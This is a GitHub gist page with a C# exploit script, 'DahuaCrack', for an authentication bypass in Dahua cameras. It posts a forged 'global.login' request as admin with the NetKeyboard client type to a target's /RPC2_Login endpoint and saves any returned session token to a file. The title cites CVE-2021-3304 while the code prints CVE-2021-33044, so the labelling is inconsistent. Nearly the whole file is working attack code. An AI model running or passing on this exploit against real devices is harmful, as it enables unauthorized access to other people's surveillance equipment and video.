Created
June 30, 2023 15:23
-
-
Save chaosifier/7a3574701e978522c125fd8e39912af1 to your computer and use it in GitHub Desktop.
Dahua CVE-2021-3304 C# .NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net.Http; | |
| using System.Net.Http.Headers; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using Newtonsoft.Json; | |
| namespace Sandbox | |
| { | |
| public static class DahuaCrack | |
| { | |
| public static async Task Crack(string ip, string port, string protocol) | |
| { | |
| try | |
| { | |
| var httpClient = new HttpClient(); | |
| httpClient.Timeout = TimeSpan.FromSeconds(5); | |
| httpClient.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json")); | |
| var target = $"{ip}:{port}"; | |
| var url = $"{protocol}://{target}/RPC2_Login"; | |
| Console.WriteLine(url); | |
| var headers = new | |
| { | |
| Accept = "application/json, text/javascript, */*; q=0.01", | |
| XRequestedWith = "XMLHttpRequest", | |
| UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", | |
| ContentType = "application/x-www-form-urlencoded; charset=UTF-8", | |
| Origin = $"{target}/", | |
| Referer = $"{target}/", | |
| AcceptEncoding = "gzip, deflate", | |
| AcceptLanguage = "en-US,en;q=0.9", | |
| Connection = "close" | |
| }; | |
| var postJson = new | |
| { | |
| id = 1, | |
| method = "global.login", | |
| @params = new | |
| { | |
| authorityType = "Default", | |
| clientType = "NetKeyboard", | |
| loginType = "Direct", | |
| password = "Not Used", | |
| passwordType = "Default", | |
| userName = "admin" | |
| }, | |
| session = 0 | |
| }; | |
| var content = new StringContent(JsonConvert.SerializeObject(postJson), Encoding.UTF8, "application/json"); | |
| var response = await httpClient.PostAsync(url, content); | |
| var responseContent = await response.Content.ReadAsStringAsync(); | |
| Console.WriteLine(responseContent); | |
| if (responseContent.Contains("true")) | |
| { | |
| Console.WriteLine("vulnerable with CVE-2021-33044"); | |
| await System.IO.File.WriteAllTextAsync("vulnerable.txt", $"{url}\n{responseContent}"); | |
| Console.WriteLine("session token saved to vulnerable.txt"); | |
| } | |
| else | |
| { | |
| Console.WriteLine("Not Vulnerable with CVE-2021-3304!"); | |
| } | |
| } | |
| catch (Exception ex) | |
| { | |
| Console.WriteLine(ex.Message); | |
| } | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment